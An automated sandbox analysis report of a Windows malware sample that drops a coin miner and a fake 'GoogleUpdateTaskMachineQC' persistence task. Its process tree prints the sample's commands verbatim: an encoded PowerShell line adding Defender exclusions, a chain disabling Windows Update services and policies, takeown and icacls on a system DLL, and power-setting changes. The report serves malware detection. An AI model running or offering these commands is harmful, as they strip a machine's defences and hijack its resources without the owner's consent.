Analysis
max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 04-05-2022 12:32
Static task: static1
General
Target: 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
Size: 184KB
MD5: 03bc0abedf428f004fb59b738d2c2923
SHA1: f2e1f9a0eabb21c4287114ef4062cb3389cce2c8
SHA256: 769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48
SHA512: cb1344fbc66d84e467bb16f41f7a41c55130e51be4a642364376b28139170234a3ec46cb84eedbf7b5a0fb3adc4191f536ae8f0c05598be4aac0cd4aaa25e372
Malware Config
Signatures
-
suricata: ET MALWARE Observed Zingo/GinzoStealer CnC Domain (nominally .ru in TLS SNI)
-
XMRig Miner Payload 5 IoCs
Processes:
resource  yara_rule
behavioral1/memory/4984-228-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
behavioral1/memory/4984-230-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
behavioral1/memory/4984-229-0x000000014036DAD4-mapping.dmp  xmrig
behavioral1/memory/4984-231-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
behavioral1/memory/4984-233-0x0000000140000000-0x0000000140803000-memory.dmp  xmrig
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
pid   process
4220  838029.exe
1332  updater.exe
-
Possible privilege escalation attempt 4 IoCs
Processes:
pid   process
2664  takeown.exe
240   icacls.exe
2332  takeown.exe
4564  icacls.exe
-
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description        ioc  process
Key value queried  \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
-
Loads dropped DLL 7 IoCs
Processes:
pid   process
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
-
Modifies file permissions 1 TTPs 4 IoCs
Processes:
pid   process
4564  icacls.exe
2664  takeown.exe
240   icacls.exe
2332  takeown.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow  ioc
16    freegeoip.app
17    freegeoip.app
-
Suspicious use of SetThreadContext 2 IoCs
Processes:
description                          pid   process      target process
PID 2744 set thread context of 2320  2744  conhost.exe  conhost.exe
PID 2744 set thread context of 4984  2744  conhost.exe  explorer.exe
-
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description        ioc  process
Key opened         \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pid   process
2348  powershell.exe
2348  powershell.exe
2220  conhost.exe
3260  powershell.exe
3260  powershell.exe
2744  conhost.exe
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid   process
660
-
Suspicious use of AdjustPrivilegeToken 23 IoCs
Processes:
pid   process                                                                token
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe  SeDebugPrivilege
2348  powershell.exe  SeDebugPrivilege
2220  conhost.exe     SeDebugPrivilege
3928  powercfg.exe    SeShutdownPrivilege
3928  powercfg.exe    SeCreatePagefilePrivilege
4776  powercfg.exe    SeShutdownPrivilege
4776  powercfg.exe    SeCreatePagefilePrivilege
4884  powercfg.exe    SeShutdownPrivilege
4884  powercfg.exe    SeCreatePagefilePrivilege
4700  powercfg.exe    SeShutdownPrivilege
4700  powercfg.exe    SeCreatePagefilePrivilege
3260  powershell.exe  SeDebugPrivilege
2744  conhost.exe     SeDebugPrivilege
4636  powercfg.exe    SeShutdownPrivilege
4636  powercfg.exe    SeCreatePagefilePrivilege
2948  powercfg.exe    SeShutdownPrivilege
2948  powercfg.exe    SeCreatePagefilePrivilege
2284  powercfg.exe    SeShutdownPrivilege
2284  powercfg.exe    SeCreatePagefilePrivilege
3116  powercfg.exe    SeShutdownPrivilege
3116  powercfg.exe    SeCreatePagefilePrivilege
4984  explorer.exe    SeLockMemoryPrivilege
4984  explorer.exe    SeLockMemoryPrivilege
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
pid   process  ->  target pid  target process
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe  ->  4220  838029.exe
2892  769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe  ->  4220  838029.exe
4220  838029.exe   ->  2220  conhost.exe
4220  838029.exe   ->  2220  conhost.exe
4220  838029.exe   ->  2220  conhost.exe
2220  conhost.exe  ->  1936  cmd.exe
2220  conhost.exe  ->  1936  cmd.exe
1936  cmd.exe      ->  2348  powershell.exe
1936  cmd.exe      ->  2348  powershell.exe
2220  conhost.exe  ->  3496  cmd.exe
2220  conhost.exe  ->  3496  cmd.exe
2220  conhost.exe  ->  2060  cmd.exe
2220  conhost.exe  ->  2060  cmd.exe
3496  cmd.exe      ->  2132  sc.exe
3496  cmd.exe      ->  2132  sc.exe
2060  cmd.exe      ->  3928  powercfg.exe
2060  cmd.exe      ->  3928  powercfg.exe
3496  cmd.exe      ->  4692  sc.exe
3496  cmd.exe      ->  4692  sc.exe
2060  cmd.exe      ->  4776  powercfg.exe
2060  cmd.exe      ->  4776  powercfg.exe
3496  cmd.exe      ->  4104  sc.exe
3496  cmd.exe      ->  4104  sc.exe
2060  cmd.exe      ->  4884  powercfg.exe
2060  cmd.exe      ->  4884  powercfg.exe
3496  cmd.exe      ->  2320  sc.exe
3496  cmd.exe      ->  2320  sc.exe
2060  cmd.exe      ->  4700  powercfg.exe
2060  cmd.exe      ->  4700  powercfg.exe
3496  cmd.exe      ->  2036  sc.exe
3496  cmd.exe      ->  2036  sc.exe
2220  conhost.exe  ->  3408  cmd.exe
2220  conhost.exe  ->  3408  cmd.exe
3496  cmd.exe      ->  796   sc.exe
3496  cmd.exe      ->  796   sc.exe
3408  cmd.exe      ->  964   schtasks.exe
3408  cmd.exe      ->  964   schtasks.exe
3496  cmd.exe      ->  4780  sc.exe
3496  cmd.exe      ->  4780  sc.exe
3496  cmd.exe      ->  4416  sc.exe
3496  cmd.exe      ->  4416  sc.exe
3496  cmd.exe      ->  4984  sc.exe
3496  cmd.exe      ->  4984  sc.exe
3496  cmd.exe      ->  4896  sc.exe
3496  cmd.exe      ->  4896  sc.exe
3496  cmd.exe      ->  3964  sc.exe
3496  cmd.exe      ->  3964  sc.exe
3496  cmd.exe      ->  968   sc.exe
3496  cmd.exe      ->  968   sc.exe
3496  cmd.exe      ->  4388  sc.exe
3496  cmd.exe      ->  4388  sc.exe
3496  cmd.exe      ->  3328  sc.exe
3496  cmd.exe      ->  3328  sc.exe
3496  cmd.exe      ->  2096  sc.exe
3496  cmd.exe      ->  2096  sc.exe
3496  cmd.exe      ->  2664  takeown.exe
3496  cmd.exe      ->  2664  takeown.exe
3496  cmd.exe      ->  240   icacls.exe
3496  cmd.exe      ->  240   icacls.exe
3496  cmd.exe      ->  3564  reg.exe
3496  cmd.exe      ->  3564  reg.exe
3496  cmd.exe      ->  2616  reg.exe
3496  cmd.exe      ->  2616  reg.exe
3496  cmd.exe      ->  4588  reg.exe
Processes
[1] C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\769e759ab44a310c6b44f1da3a5f895cab0e33f7bccd1428d09f344587eaec48.exe"
    - Checks computer location settings
    - Loads dropped DLL
    - Checks processor information in registry
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\838029.exe
      cmdline: "C:\Users\Admin\AppData\Local\838029.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\conhost.exe
        cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\838029.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            cmdline: powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
            decoded (base64 of UTF-16LE): <#qy#> Add-MpPreference <#txa#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#rs#> -Force <#bzhb#>
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\sc.exe
            cmdline: sc stop wuauserv
        [5] C:\Windows\system32\sc.exe
            cmdline: sc stop bits
        [5] C:\Windows\system32\sc.exe
            cmdline: sc stop dosvc
        [5] C:\Windows\system32\sc.exe
            cmdline: sc stop UsoSvc
        [5] C:\Windows\system32\sc.exe
            cmdline: sc stop WaaSMedicSvc
        [5] C:\Windows\system32\sc.exe
            cmdline: sc config wuauserv start= disabled
        [5] C:\Windows\system32\sc.exe
            cmdline: sc failure wuauserv reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            cmdline: sc config bits start= disabled
        [5] C:\Windows\system32\sc.exe
            cmdline: sc failure bits reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            cmdline: sc config dosvc start= disabled
        [5] C:\Windows\system32\sc.exe
            cmdline: sc failure dosvc reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            cmdline: sc config UsoSvc start= disabled
        [5] C:\Windows\system32\sc.exe
            cmdline: sc failure UsoSvc reset= 0 actions= ""
        [5] C:\Windows\system32\sc.exe
            cmdline: sc config wuauserv start= disabled
        [5] C:\Windows\system32\sc.exe
            cmdline: sc failure wuauserv reset= 0 actions= ""
        [5] C:\Windows\system32\takeown.exe
            cmdline: takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\icacls.exe
            cmdline: icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
            - Possible privilege escalation attempt
            - Modifies file permissions
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        [5] C:\Windows\system32\reg.exe
            cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
        [5] C:\Windows\system32\schtasks.exe
            cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\powercfg.exe
            cmdline: powercfg /x -hibernate-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            cmdline: powercfg /x -hibernate-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            cmdline: powercfg /x -standby-timeout-ac 0
            - Suspicious use of AdjustPrivilegeToken
        [5] C:\Windows\system32\powercfg.exe
            cmdline: powercfg /x -standby-timeout-dc 0
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\schtasks.exe
            cmdline: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
            - Creates scheduled task(s)
      [4] C:\Windows\System32\cmd.exe
          cmdline: "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        [5] C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
            cmdline: C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
            - Executes dropped EXE
          [6] C:\Windows\System32\conhost.exe
              cmdline: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
              - Suspicious use of SetThreadContext
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  cmdline: powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
                  decoded (base64 of UTF-16LE): <#qy#> Add-MpPreference <#txa#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#rs#> -Force <#bzhb#>
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc stop wuauserv
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc stop bits
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc stop dosvc
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc stop UsoSvc
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc stop WaaSMedicSvc
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc config wuauserv start= disabled
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc failure wuauserv reset= 0 actions= ""
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc config bits start= disabled
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc failure bits reset= 0 actions= ""
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc config dosvc start= disabled
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc failure dosvc reset= 0 actions= ""
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc config UsoSvc start= disabled
              [8] C:\Windows\system32\takeown.exe
                  cmdline: takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
                  - Possible privilege escalation attempt
                  - Modifies file permissions
              [8] C:\Windows\system32\icacls.exe
                  cmdline: icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                  - Possible privilege escalation attempt
                  - Modifies file permissions
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc failure wuauserv reset= 0 actions= ""
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc config wuauserv start= disabled
              [8] C:\Windows\system32\sc.exe
                  cmdline: sc failure UsoSvc reset= 0 actions= ""
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
              [8] C:\Windows\system32\reg.exe
                  cmdline: reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
              [8] C:\Windows\system32\schtasks.exe
                  cmdline: SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
            [7] C:\Windows\System32\cmd.exe
                cmdline: "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              [8] C:\Windows\system32\powercfg.exe
                  cmdline: powercfg /x -hibernate-timeout-ac 0
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\system32\powercfg.exe
                  cmdline: powercfg /x -hibernate-timeout-dc 0
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\system32\powercfg.exe
                  cmdline: powercfg /x -standby-timeout-ac 0
                  - Suspicious use of AdjustPrivilegeToken
              [8] C:\Windows\system32\powercfg.exe
                  cmdline: powercfg /x -standby-timeout-dc 0
                  - Suspicious use of AdjustPrivilegeToken
            [7] C:\Windows\System32\conhost.exe
                cmdline: C:\Windows\System32\conhost.exe
            [7] C:\Windows\explorer.exe
                cmdline: C:\Windows\explorer.exe clcmeewnjgen0 [remainder of command line not preserved in the report]
                - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
C:\Users\Admin\AppData\Local\838029.exe
Filesize 4.2MB
MD5 8268ff95b3aaea6d6de8f02a73c323d2
SHA1 ae470145c4f5780315b52aa1c57ae0c04a2d18ca
SHA256 529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8
SHA512 9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0
-
